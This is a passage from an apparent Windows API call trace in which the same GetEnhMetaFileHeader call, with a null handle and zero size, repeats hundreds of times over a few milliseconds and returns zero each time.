lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 